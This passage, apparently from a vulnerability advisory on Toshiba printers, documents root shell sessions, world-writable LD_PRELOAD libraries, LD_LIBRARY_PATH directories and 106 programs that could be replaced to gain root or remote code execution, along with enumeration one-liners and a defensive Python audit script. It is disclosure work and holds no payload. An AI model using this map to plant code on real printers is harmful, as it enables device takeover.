  • /ramdisk/al/libGetNameInfoInterface.so

  • /ramdisk/al/libGetAddtInfoInterface.so

Checking the permissions of the libraries defined in LD_PRELOAD:

bash-4.1# ls -la /ramdisk/al/libGetNameInfoInterface.so
-rwxrwxrwx 1 root root 70813 Dec 6 02:02 /ramdisk/al/libGetNameInfoInterface.so
bash-4.1# ls -la /ramdisk/al/libGetAddtInfoInterface.so
-rwxrwxrwx 1 root root 87311 Dec 6 02:02 /ramdisk/al/libGetAddtInfoInterface.so
bash-4.1#

We can confirm that these two libraries are loaded into the programs running inside the printer.

Using /proc/$PID/maps, we can list the libraries loaded by each program: these two libraries are loaded in every program running as root and as apache on the printer:

bash-4.1# cd /proc && for i in */; do cat $i/cmdline && echo && grep ramdisk $i/maps;done
/home/SYSROM_SRC/build/release/bin/nqnd
77788000-77797000 r-xp 00000000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
77797000-77799000 rw-p 0000e000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
77799000-777a4000 r-xp 00000000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
777a4000-777a6000 rw-p 0000a000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
/home/SYSROM_SRC/build/release/bin/nqcs
7776d000-7777c000 r-xp 00000000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
7777c000-7777e000 rw-p 0000e000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
7777e000-77789000 r-xp 00000000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
77789000-7778b000 rw-p 0000a000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
[...]
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
777b5000-777c4000 r-xp 00000000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
777c4000-777c6000 rw-p 0000e000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
777c7000-777d2000 r-xp 00000000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
777d2000-777d4000 rw-p 0000a000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
777b5000-777c4000 r-xp 00000000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
777c4000-777c6000 rw-p 0000e000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
777c7000-777d2000 r-xp 00000000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
777d2000-777d4000 rw-p 0000a000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
[...]
./alusermgr
776f6000-77705000 r-xp 00000000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
77705000-77707000 rw-p 0000e000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
77707000-77712000 r-xp 00000000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
77712000-77714000 rw-p 0000a000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
./allicensemgmt
777dc000-777eb000 r-xp 00000000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
777eb000-777ed000 rw-p 0000e000 00:0d 10712      /ramdisk/al/libGetAddtInfoInterface.so
777ed000-777f8000 r-xp 00000000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
777f8000-777fa000 rw-p 0000a000 00:0d 7014       /ramdisk/al/libGetNameInfoInterface.so
[...]

An attacker can remotely compromise any Toshiba printer.

Details – Local privilege escalation and remote code execution using an insecure LD_LIBRARY_PATH

The Toshiba printers are vulnerable to local privilege escalation because of an insecure LD_LIBRARY_PATH variable. This local privilege escalation can also be turned into remote code execution by uploading a malicious library using the pre-auth remote code execution as root or apache and the multiple local privilege escalation vulnerabilities.

The Toshiba printers are configured with an insecure $LD_LIBRARY_PATH variable:

bash-4.1# printenv|grep LD_LIBRARY_PATH
LD_LIBRARY_PATH=/home/SYSROM_SRC/build/release/lib:/mfp/lib:/home/SYSROM_SRC/NoBuildItems/common/lib:/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/:/home/SYSROM_SRC/build/release/lib
bash-4.1#

The $LD_LIBRARY_PATH variable contains 4 directories with insecure permissions (777); any attacker can replace the libraries in them with malicious libraries, which are then loaded and executed:

  • /home/SYSROM_SRC/build/release/lib

  • /mfp/lib

  • /home/SYSROM_SRC/NoBuildItems/common/lib

  • /home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/

We can confirm that these directories have insecure permissions and/or that the files stored in them have insecure permissions, as shown below:

Insecure permissions of /home/SYSROM_SRC/build/release/lib:

bash-4.1# ls -la /home/SYSROM_SRC/build/release/lib
total 391144
drwxrwxrwx 4 root root 65536 May 27 16:28 .
drwxrwxrwx 19 root root 4096 May 27 16:28 ..
lrwxrwxrwx 1 root root 38 Apr 6 2016 ImageMagick-6.3.3 -> ../../thirdparty/lib/ImageMagick-6.3.3
lrwxrwxrwx 1 root root 38 Mar 14 16:27 ImageMagick-6.7.5 -> ../../thirdparty/lib/ImageMagick-6.7.5
lrwxrwxrwx 1 root root 15 Mar 14 16:27 al8021XNMO.so -> al8021XNMO.so.0
-rwxrwxrwx 1 root root 223011 Dec 6 01:58 al8021XNMO.so.0
lrwxrwxrwx 1 root root 14 Mar 14 16:27 alDDNSNMO.so -> alDDNSNMO.so.0
-rwxrwxrwx 1 root root 171442 Dec 6 01:59 alDDNSNMO.so.0
lrwxrwxrwx 1 root root 13 Mar 14 16:27 alDNSNMO.so -> alDNSNMO.so.0
[...]

Insecure permissions of /mfp/lib:

bash-4.1# ls -la /mfp/lib 
total 344308
drwxr-xr-x 2 root root 12288 May 27 16:28 .
drwxr-xr-x 8 root root 4096 May 27 16:28 ..
-rwxrwxrwx 1 root root 75 Jan 11 2013 DirectoryCopy.txt
-rwxrwxrwx 1 root root 203 Jun 29 2017 SharedFiles.ini
-rwxrwxrwx 1 root root 6210326 Jun 9 2022 laser.so
-rwxrwxrwx 1 root root 11386849 Jun 9 2022 laserc1x.so
-rwxrwxrwx 1 root root 298388 Dec 17 2017 libAbbyyZlib.so
-rwxrwxrwx 1 root root 1518996 Dec 17 2017 libBarcode.so
-rwxrwxrwx 1 root root 1045032 Dec 17 2017 libBusinessCard.Analyser.so
[...]

Insecure permissions of /home/SYSROM_SRC/NoBuildItems/common/lib:

bash-4.1# ls -la /home/SYSROM_SRC/NoBuildItems/common/lib
total 49580
drwxrwxrwx 2 root root 4096 May 27 16:27 .
drwxrwxrwx 4 root root 4096 Dec 6 00:21 ..
-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so
-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so.0
-rwxrwxrwx 1 root root 624082 Apr 20 2018 libCryptolib.so.0.0.0
-rwxrwxrwx 1 root root 22366570 Jun 4 2018 libFREmbed.so
lrwxrwxrwx 1 root root 14 Mar 14 16:27 libasicif.so -> libasicif.so.1
lrwxrwxrwx 1 root root 16 Mar 14 16:27 libasicif.so.1 -> libasicif.so.1.0
-rwxrwxrwx 1 root root 12649 Apr 2 2016 libasicif.so.1.0
[...]

Insecure permissions of /home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/:

bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/
total 13036
drwxrwxrwx 2 510 510 4096 Sep 13 2019 .
drwxrwxrwx 18 510 510 4096 Sep 13 2019 ..
-rwxrwxrwx 1 510 510 84844 Aug 25 2016 libibusplatforminputcontextplugin.so
-rwxrwxrwx 1 510 510 13252081 Sep 13 2019 libscreenkeyboardplugin.so
bash-4.1#

Incidentally, all the libraries in the listings above also have insecure permissions.

An attacker can remotely compromise any Toshiba printer.

Details – Local privilege escalation and remote code execution using insecure permissions on 106 programs

The Toshiba printers run a number of vendor-specific programs. These programs run as root and have insecure permissions (777), which allows an attacker to replace them with malicious programs. This local privilege escalation can also be turned into remote code execution by uploading malicious programs using the pre-auth remote code execution as root or apache and the multiple local privilege escalation vulnerabilities.

Some of the programs running as root, for example:

bash-4.1# ps auxw | grep root
root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00 /home/SYSROM_SRC/build/release/bin/slapd -h ldap://127.0.0.1 -f /home/SYSROM_SRC/build/release/etc/openldap/slapd.conf -d 1
root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02 /home/SYSROM_SRC/bin/mapper firstboot=0
[...]
root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02 ./cissm -T 7 -d ssm.xml
root 1647 0.0 0.3 67568 9256 ? Sl 16:34 0:02 ./cischeduler -S ramdisk
root 1648 0.0 0.3 49452 11852 ? Sl 16:34 0:00 ./cisystemresourcemanager -T8
root 1650 0.0 0.3 50320 11112 ? S 16:34 0:00 ./pipeMN -T8
root 1652 0.0 0.3 47372 10708 ? S 16:34 0:00 ./cpe -T8
root 1653 0.0 0.2 35524 8888 ? S 16:34 0:00 ./dem -T8
root 1654 0.0 0.4 53448 12588 ? S 16:34 0:00 ./dim -T8
root 1655 0.1 0.4 96460 12128 ? Sl 16:34 0:18 ./alboserver -T5
[...]

Using the following one-liners, the files corresponding to the programs running inside the printer can be listed:

Programs running as root:

bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done

Programs running as a different user:

for i in $(ps auxww | grep -v root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done

These commands list the 106 vulnerable programs found inside the printer.
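As an added example (not the post's own tooling), the following Python audit combines the manual checks from the PATH, LD_PRELOAD, LD_LIBRARY_PATH and running-programs sections into a single pass over a host: it flags world-writable executables behind running processes and world-writable entries in those three variables, de-duplicating the repeated directories seen in the printer's PATH. The sample snapshot is constructed from the permissions shown on this page, and the function names and the stat/listdir injection are assumptions made for the example.

```python
import os
import stat
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Finding:
    kind: str        # exe | path_dir | preload_lib | ld_library_dir | ld_library_file
    path: str
    mode: str        # permission bits as octal text, e.g. 0o777
    user: str = ""   # owner of the running process (exe findings only)


ModeFn = Callable[[str], Optional[int]]   # path -> st_mode, or None if missing
ListFn = Callable[[str], List[str]]       # directory -> entry names


def _perm(mode: int) -> str:
    return oct(mode & 0o7777)


def _split_var(value: str) -> List[str]:
    """Split a colon-separated variable, keeping the first occurrence only:
    the printer's PATH repeats the same directories many times."""
    seen, out = set(), []
    for item in value.split(":"):
        if item and item not in seen:
            seen.add(item)
            out.append(item)
    return out


def audit(processes: Iterable[Tuple[str, str]], env: Dict[str, str],
          mode_of: ModeFn, list_dir: ListFn) -> List[Finding]:
    """Report every executable, directory or library that others can write to.
    mode_of and list_dir are injected so the same logic runs against a live
    host or a constructed snapshot."""
    findings: List[Finding] = []

    def check(kind: str, path: str, user: str = "") -> None:
        mode = mode_of(path)
        if mode is not None and mode & stat.S_IWOTH:
            findings.append(Finding(kind, path, _perm(mode), user))

    for user, exe in dict.fromkeys(processes):          # de-duplicate (user, exe)
        check("exe", exe, user)
    for directory in _split_var(env.get("PATH", "")):
        check("path_dir", directory)
    for lib in _split_var(env.get("LD_PRELOAD", "")):
        check("preload_lib", lib)
    for directory in _split_var(env.get("LD_LIBRARY_PATH", "")):
        check("ld_library_dir", directory)
        for name in list_dir(directory):                 # /mfp/lib: 755 dir, 777 .so files
            if ".so" in name:
                check("ld_library_file", os.path.join(directory, name))
    return findings


# Constructed snapshot mirroring permissions shown on this page (not live data).
SAMPLE_PROCESSES = [
    ("root", "/home/SYSROM_SRC/build/release/bin/alusermgr"),
    ("root", "/home/SYSROM_SRC/build/release/bin/alusermgr"),   # second pid, same exe
    ("apache", "/usr/local/ebx/httpd_worker/bin/httpd_worker"),
    ("root", "/sbin/init"),
]
SAMPLE_ENV = {
    "PATH": "/home/SYSROM_SRC/build/release/bin:/bin:/home/SYSROM_SRC/build/release/bin",
    "LD_PRELOAD": "/ramdisk/al/libGetNameInfoInterface.so:",
    "LD_LIBRARY_PATH": "/mfp/lib:/home/SYSROM_SRC/build/release/lib",
}
SAMPLE_MODES = {
    "/home/SYSROM_SRC/build/release/bin/alusermgr": 0o100777,
    "/usr/local/ebx/httpd_worker/bin/httpd_worker": 0o100777,
    "/sbin/init": 0o100755,
    "/home/SYSROM_SRC/build/release/bin": 0o040777,
    "/bin": 0o040755,
    "/ramdisk/al/libGetNameInfoInterface.so": 0o100777,
    "/mfp/lib": 0o040755,
    "/mfp/lib/laser.so": 0o100777,
    "/home/SYSROM_SRC/build/release/lib": 0o040777,
}
SAMPLE_DIRS = {"/mfp/lib": ["laser.so", "SharedFiles.ini"],
               "/home/SYSROM_SRC/build/release/lib": []}


def audit_sample() -> List[Finding]:
    return audit(SAMPLE_PROCESSES, SAMPLE_ENV, SAMPLE_MODES.get,
                 lambda d: SAMPLE_DIRS.get(d, []))


def live_processes() -> List[Tuple[str, str]]:
    """(owner uid, resolved executable) for every process in /proc on Linux."""
    out = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            out.append((str(os.stat(f"/proc/{pid}").st_uid), os.readlink(f"/proc/{pid}/exe")))
        except OSError:
            continue
    return out


def live_mode(path: str) -> Optional[int]:
    try:
        return os.stat(path).st_mode
    except OSError:
        return None


def live_list(path: str) -> List[str]:
    try:
        return os.listdir(path)
    except OSError:
        return []


if __name__ == "__main__":
    env = {k: os.environ.get(k, "") for k in ("PATH", "LD_PRELOAD", "LD_LIBRARY_PATH")}
    for f in audit(live_processes(), env, live_mode, live_list):
        print(f"{f.kind:16} {f.mode:6} {f.user:8} {f.path}")
```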

3 vulnerable programs not running as root

3 programs were identified as vulnerable (running as a low-privileged user and overwritable by any local or remote attacker):

  • /home/SYSROM_SRC/thirdparty/sbin/slpd

  • /usr/local/ebx/bin/httpd

  • /usr/local/ebx/httpd_worker/bin/httpd_worker

Vulnerable programs not running as root:

bash-4.1# for i in $(ps auxww | grep -v root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done

lrwxrwxrwx 1 root root 26 Mar 14 16:27 /home/SYSROM_SRC/bin/slpd -> ../../thirdparty/sbin/slpd
-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 /usr/local/ebx/bin/httpd
-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34 /usr/local/ebx/httpd_worker/bin/httpd_worker
bash-4.1#

Following the slpd symbolic link, we can confirm that its target is vulnerable too:

bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/sbin/slpd
-rwxrwxrwx 1 root root 106023 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/sbin/slpd
bash-4.1#

103 vulnerable programs running as root

103 programs were identified as vulnerable (running as root and overwritable by any local or remote attacker):

  • /home/SYSROM_SRC/bin/alllmnr

  • /home/SYSROM_SRC/bin/dnsValidateDaemon

  • /home/SYSROM_SRC/bin/eBXDebugLogUtility

  • /home/SYSROM_SRC/bin/ipv6_daemon

  • /home/SYSROM_SRC/bin/mapper

  • /home/SYSROM_SRC/bin/syscallerr

  • /home/SYSROM_SRC/build/release/bin/agent_faxreceive

  • /home/SYSROM_SRC/build/release/bin/agent_faxtransmit

  • /home/SYSROM_SRC/build/release/bin/agent_ipfaxreceive

  • /home/SYSROM_SRC/build/release/bin/agent_ipfaxtransmit

  • /home/SYSROM_SRC/build/release/bin/agent_print

  • /home/SYSROM_SRC/build/release/bin/agent_rip

  • /home/SYSROM_SRC/build/release/bin/agent_scan

  • /home/SYSROM_SRC/build/release/bin/alaccountmgr

  • /home/SYSROM_SRC/build/release/bin/alAddressBookMgr

  • /home/SYSROM_SRC/build/release/bin/alappmanager

  • /home/SYSROM_SRC/build/release/bin/alboserver

  • /home/SYSROM_SRC/build/release/bin/alcbamanager

  • /home/SYSROM_SRC/build/release/bin/alCloning

  • /home/SYSROM_SRC/build/release/bin/aldevauthmgmtplugin

  • /home/SYSROM_SRC/build/release/bin/aldeviceconfigplugin

  • /home/SYSROM_SRC/build/release/bin/aldeviceserviceplugin

  • /home/SYSROM_SRC/build/release/bin/aleFilingmgr

  • /home/SYSROM_SRC/build/release/bin/aleSCL

  • /home/SYSROM_SRC/build/release/bin/alExportImport

  • /home/SYSROM_SRC/build/release/bin/alfilestoragem

  • /home/SYSROM_SRC/build/release/bin/alftpprintd

  • /home/SYSROM_SRC/build/release/bin/algrpmgr

  • /home/SYSROM_SRC/build/release/bin/alhddalertmgr

  • /home/SYSROM_SRC/build/release/bin/alhddbackuprestore

  • /home/SYSROM_SRC/build/release/bin/alhomedatamgr

  • /home/SYSROM_SRC/build/release/bin/alhp9100

  • /home/SYSROM_SRC/build/release/bin/alifaxreceive

  • /home/SYSROM_SRC/build/release/bin/alintegritychkmgr

  • /home/SYSROM_SRC/build/release/bin/aljobcontroller

  • /home/SYSROM_SRC/build/release/bin/aljobtemplatemgr

  • /home/SYSROM_SRC/build/release/bin/allicensemgmt

  • /home/SYSROM_SRC/build/release/bin/allld2d

  • /home/SYSROM_SRC/build/release/bin/alLogmanager

  • /home/SYSROM_SRC/build/release/bin/alLogRetriever

  • /home/SYSROM_SRC/build/release/bin/allprng

  • /home/SYSROM_SRC/build/release/bin/almailboxapplication

  • /home/SYSROM_SRC/build/release/bin/almaintenanceplugin

  • /home/SYSROM_SRC/build/release/bin/alnetefiRemoteifsr

  • /home/SYSROM_SRC/build/release/bin/alnfcplugin

  • /home/SYSROM_SRC/build/release/bin/alnsm

  • /home/SYSROM_SRC/build/release/bin/alpanel

  • /home/SYSROM_SRC/build/release/bin/alPanelStartLEDHandler

  • /home/SYSROM_SRC/build/release/bin/alPanelUIMessageHandler

  • /home/SYSROM_SRC/build/release/bin/alpdlfiltermanager

  • /home/SYSROM_SRC/build/release/bin/alpresentationresourcemgr

  • /home/SYSROM_SRC/build/release/bin/alprintmn

  • /home/SYSROM_SRC/build/release/bin/alreportmanager

  • /home/SYSROM_SRC/build/release/bin/alreportsmsgr

  • /home/SYSROM_SRC/build/release/bin/alrestrictionmode

  • /home/SYSROM_SRC/build/release/bin/alrolemgr

  • /home/SYSROM_SRC/build/release/bin/alsecurityconfiguration

  • /home/SYSROM_SRC/build/release/bin/alServiceUIPlugin

  • /home/SYSROM_SRC/build/release/bin/alsharedprintDp

  • /home/SYSROM_SRC/build/release/bin/alsoftwareupdateclient

  • /home/SYSROM_SRC/build/release/bin/alstage2

  • /home/SYSROM_SRC/build/release/bin/alUiFrameWork

  • /home/SYSROM_SRC/build/release/bin/alulm

  • /home/SYSROM_SRC/build/release/bin/alusbmscapplication

  • /home/SYSROM_SRC/build/release/bin/alusbPrint

  • /home/SYSROM_SRC/build/release/bin/aluserAuthMgr

  • /home/SYSROM_SRC/build/release/bin/alusermgr

  • /home/SYSROM_SRC/build/release/bin/alViewPlugin

  • /home/SYSROM_SRC/build/release/bin/alwsdiscovery

  • /home/SYSROM_SRC/build/release/bin/alwsmex

  • /home/SYSROM_SRC/build/release/bin/alwsprint

  • /home/SYSROM_SRC/build/release/bin/alwsscanner

  • /home/SYSROM_SRC/build/release/bin/armn

  • /home/SYSROM_SRC/build/release/bin/cipollproc

  • /home/SYSROM_SRC/build/release/bin/ciprioritymanager

  • /home/SYSROM_SRC/build/release/bin/cischeduler

  • /home/SYSROM_SRC/build/release/bin/cissm

  • /home/SYSROM_SRC/build/release/bin/cisystemresourcemanager

  • /home/SYSROM_SRC/build/release/bin/cpe

  • /home/SYSROM_SRC/build/release/bin/de_ipfax

  • /home/SYSROM_SRC/build/release/bin/dem

  • /home/SYSROM_SRC/build/release/bin/dim

  • /home/SYSROM_SRC/build/release/bin/ebx_dl

  • /home/SYSROM_SRC/build/release/bin/faxmilter

  • /home/SYSROM_SRC/build/release/bin/informationservice

  • /home/SYSROM_SRC/build/release/bin/notificationservice

  • /home/SYSROM_SRC/build/release/bin/pipeMN

  • /home/SYSROM_SRC/build/release/bin/sim

  • /home/SYSROM_SRC/build/release/bin/sljobmanagement

  • /home/SYSROM_SRC/build/release/bin/snmp_watchdog

  • /home/SYSROM_SRC/build/release/bin/ssdktimestamp

  • /home/SYSROM_SRC/build/release/bin/wfpc

  • /home/SYSROM_SRC/build/thirdparty/bin/alipp

  • /home/SYSROM_SRC/build/thirdparty/bin/dibbler-client

  • /home/SYSROM_SRC/build/thirdparty/bin/mDNSResponderPosix

  • /home/SYSROM_SRC/build/thirdparty/bin/nqcs

  • /home/SYSROM_SRC/build/thirdparty/bin/nqnd

  • /home/SYSROM_SRC/build/thirdparty/bin/python3.5

  • /home/SYSROM_SRC/build/thirdparty/bin/vsftpd

  • /home/SYSROM_SRC/build/thirdparty/libexec/slapd

  • /home/SYSROM_SRC/build/thirdparty/sbin/snmpd

  • /usr/local/ebx/bin/httpd

  • /usr/local/ebx/httpd_worker/bin/httpd_worker

The analysis is shown below.

Vulnerable programs running as root with insecure permissions:

bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done
-rwxrwxrwx 1 root root 562669 Dec  6 04:10 /home/SYSROM_SRC/build/release/bin/agent_faxreceive
-rwxrwxrwx 1 root root 608397 Dec  6 04:11 /home/SYSROM_SRC/build/release/bin/agent_faxtransmit
-rwxrwxrwx 1 root root 561916 Dec  6 04:38 /home/SYSROM_SRC/build/release/bin/agent_ipfaxreceive
-rwxrwxrwx 1 root root 594505 Dec  6 04:38 /home/SYSROM_SRC/build/release/bin/agent_ipfaxtransmit
-rwxrwxrwx 1 root root 572434 Dec  6 04:11 /home/SYSROM_SRC/build/release/bin/agent_print
-rwxrwxrwx 1 root root 556369 Dec  6 04:10 /home/SYSROM_SRC/build/release/bin/agent_rip
-rwxrwxrwx 1 root root 557372 Dec  6 04:10 /home/SYSROM_SRC/build/release/bin/agent_scan
-rwxrwxrwx 1 root root 2191621 Dec  6 02:13 /home/SYSROM_SRC/build/release/bin/alAddressBookMgr
-rwxrwxrwx 1 root root 939045 Dec  6 02:22 /home/SYSROM_SRC/build/release/bin/alCloning
-rwxrwxrwx 1 root root 1019576 Dec  6 02:20 /home/SYSROM_SRC/build/release/bin/alExportImport
-rwxrwxrwx 1 root root 1354094 Dec  6 02:15 /home/SYSROM_SRC/build/release/bin/alLogRetriever
-rwxrwxrwx 1 root root 734343 Dec  6 02:21 /home/SYSROM_SRC/build/release/bin/alLogmanager
-rwxrwxrwx 1 root root 241886 Dec  6 02:24 /home/SYSROM_SRC/build/release/bin/alPanelStartLEDHandler
-rwxrwxrwx 1 root root 2282226 Dec  6 02:24 /home/SYSROM_SRC/build/release/bin/alPanelUIMessageHandler
-rwxrwxrwx 1 root root 211250 Dec  6 02:22 /home/SYSROM_SRC/build/release/bin/alServiceUIPlugin
-rwxrwxrwx 1 root root 6104526 Dec  6 03:51 /home/SYSROM_SRC/build/release/bin/alUiFrameWork
-rwxrwxrwx 1 root root 673942 Dec  6 02:20 /home/SYSROM_SRC/build/release/bin/alViewPlugin
-rwxrwxrwx 1 root root 2896387 Dec  6 02:12 /home/SYSROM_SRC/build/release/bin/alaccountmgr
-rwxrwxrwx 1 root root 2917038 Dec  6 02:26 /home/SYSROM_SRC/build/release/bin/alappmanager
-rwxrwxrwx 1 root root 1055271 Dec  6 01:49 /home/SYSROM_SRC/build/release/bin/alboserver
-rwxrwxrwx 1 root root 322981 Dec  6 02:08 /home/SYSROM_SRC/build/release/bin/alcbamanager
-rwxrwxrwx 1 root root 2528851 Dec  6 02:22 /home/SYSROM_SRC/build/release/bin/aldevauthmgmtplugin
-rwxrwxrwx 1 root root 4386856 Dec  6 03:30 /home/SYSROM_SRC/build/release/bin/aldeviceconfigplugin
-rwxrwxrwx 1 root root 4300169 Dec  6 03:25 /home/SYSROM_SRC/build/release/bin/aldeviceserviceplugin
-rwxrwxrwx 1 root root 1915456 Dec  6 02:14 /home/SYSROM_SRC/build/release/bin/aleFilingmgr
-rwxrwxrwx 1 root root 580229 Dec  6 01:50 /home/SYSROM_SRC/build/release/bin/alfilestoragem
-rwxrwxrwx 1 root root 509900 Dec  6 02:21 /home/SYSROM_SRC/build/release/bin/algrpmgr
-rwxrwxrwx 1 root root 441641 Dec  6 02:24 /home/SYSROM_SRC/build/release/bin/alhddalertmgr
-rwxrwxrwx 1 root root 696894 Dec  6 02:24 /home/SYSROM_SRC/build/release/bin/alhddbackuprestore
-rwxrwxrwx 1 root root 829606 Dec  6 02:16 /home/SYSROM_SRC/build/release/bin/alhomedatamgr
-rwxrwxrwx 1 root root 606628 Dec  6 03:28 /home/SYSROM_SRC/build/release/bin/alifaxreceive
-rwxrwxrwx 1 root root 162074 Dec  6 02:22 /home/SYSROM_SRC/build/release/bin/alintegritychkmgr
-rwxrwxrwx 1 root root 4414769 Dec  6 02:08 /home/SYSROM_SRC/build/release/bin/aljobcontroller
-rwxrwxrwx 1 root root 2832921 Dec  6 02:15 /home/SYSROM_SRC/build/release/bin/aljobtemplatemgr
-rwxrwxrwx 1 root root 434559 Dec  6 02:22 /home/SYSROM_SRC/build/release/bin/allicensemgmt
-rwxrwxrwx 1 root root 1258130 Dec  6 02:15 /home/SYSROM_SRC/build/release/bin/almailboxapplication
-rwxrwxrwx 1 root root 4674491 Dec  6 03:32 /home/SYSROM_SRC/build/release/bin/almaintenanceplugin
-rwxrwxrwx 1 root root 2339610 Dec  6 02:25 /home/SYSROM_SRC/build/release/bin/alnfcplugin
-rwxrwxrwx 1 root root 743285 Dec  6 01:53 /home/SYSROM_SRC/build/release/bin/alnsm
-rwxrwxrwx 1 root root 740586 Dec  6 03:45 /home/SYSROM_SRC/build/release/bin/alpanel
-rwxrwxrwx 1 root root 292667 Dec  6 02:21 /home/SYSROM_SRC/build/release/bin/alpdlfiltermanager
-rwxrwxrwx 1 root root 387749 Dec  6 02:22 /home/SYSROM_SRC/build/release/bin/alpresentationresourcemgr
-rwxrwxrwx 1 root root 1314049 Dec  6 01:52 /home/SYSROM_SRC/build/release/bin/alprintmn
-rwxrwxrwx 1 root root 2360596 Dec  6 03:22 /home/SYSROM_SRC/build/release/bin/alreportmanager
-rwxrwxrwx 1 root root 595735 Dec  6 03:21 /home/SYSROM_SRC/build/release/bin/alreportsmsgr
-rwxrwxrwx 1 root root 1367678 Dec  6 02:19 /home/SYSROM_SRC/build/release/bin/alrestrictionmode
-rwxrwxrwx 1 root root 1253012 Dec  6 02:21 /home/SYSROM_SRC/build/release/bin/alrolemgr
-rwxrwxrwx 1 root root 2272202 Dec  6 02:18 /home/SYSROM_SRC/build/release/bin/alsecurityconfiguration
-rwxrwxrwx 1 root root 972621 Dec  6 03:52 /home/SYSROM_SRC/build/release/bin/alsharedprintDp
-rwxrwxrwx 1 root root 1060254 Dec  6 02:13 /home/SYSROM_SRC/build/release/bin/alsoftwareupdateclient
-rwxrwxrwx 1 root root 1711439 Dec  6 02:25 /home/SYSROM_SRC/build/release/bin/alulm
-rwxrwxrwx 1 root root 612467 Dec  6 02:18 /home/SYSROM_SRC/build/release/bin/alusbmscapplication
-rwxrwxrwx 1 root root 3759736 Dec  6 02:17 /home/SYSROM_SRC/build/release/bin/aluserAuthMgr
-rwxrwxrwx 1 root root 2874311 Dec  6 02:20 /home/SYSROM_SRC/build/release/bin/alusermgr
-rwxrwxrwx 1 root root 899734 Dec  6 01:53 /home/SYSROM_SRC/build/release/bin/alwsdiscovery
-rwxrwxrwx 1 root root 809391 Dec  6 01:53 /home/SYSROM_SRC/build/release/bin/alwsmex
-rwxrwxrwx 1 root root 3782642 Dec  6 01:55 /home/SYSROM_SRC/build/release/bin/alwsprint
-rwxrwxrwx 1 root root 4271522 Dec  6 01:56 /home/SYSROM_SRC/build/release/bin/alwsscanner
-rwxrwxrwx 1 root root 355919 Dec  6 03:53 /home/SYSROM_SRC/build/release/bin/armn
-rwxrwxrwx 1 root root 18113 Dec  6 01:42 /home/SYSROM_SRC/build/release/bin/cipollproc
-rwxrwxrwx 1 root root 71587 Dec  6 01:42 /home/SYSROM_SRC/build/release/bin/ciprioritymanager
-rwxrwxrwx 1 root root 445362 Dec  6 01:42 /home/SYSROM_SRC/build/release/bin/cischeduler
-rwxrwxrwx 1 root root 532898 Dec  6 01:42 /home/SYSROM_SRC/build/release/bin/cissm
-rwxrwxrwx 1 root root 508004 Dec  6 01:48 /home/SYSROM_SRC/build/release/bin/cisystemresourcemanager
-rwxrwxrwx 1 root root 501163 Dec  6 04:16 /home/SYSROM_SRC/build/release/bin/cpe
-rwxrwxrwx 1 root root 1016124 Dec  6 04:39 /home/SYSROM_SRC/build/release/bin/de_ipfax
-rwxrwxrwx 1 root root 303779 Dec  6 04:16 /home/SYSROM_SRC/build/release/bin/dem
-rwxrwxrwx 1 root root 622110 Dec  6 04:16 /home/SYSROM_SRC/build/release/bin/dim
-rwxrwxrwx 1 root root 12229927 Dec  6 04:44 /home/SYSROM_SRC/build/release/bin/ebx_dl
-rwxrwxrwx 1 root root 1649127 Dec  6 04:02 /home/SYSROM_SRC/build/release/bin/informationservice
-rwxrwxrwx 1 root root 1257189 Dec  6 04:01 /home/SYSROM_SRC/build/release/bin/notificationservice
-rwxrwxrwx 1 root root 426167 Dec  6 04:14 /home/SYSROM_SRC/build/release/bin/pipeMN
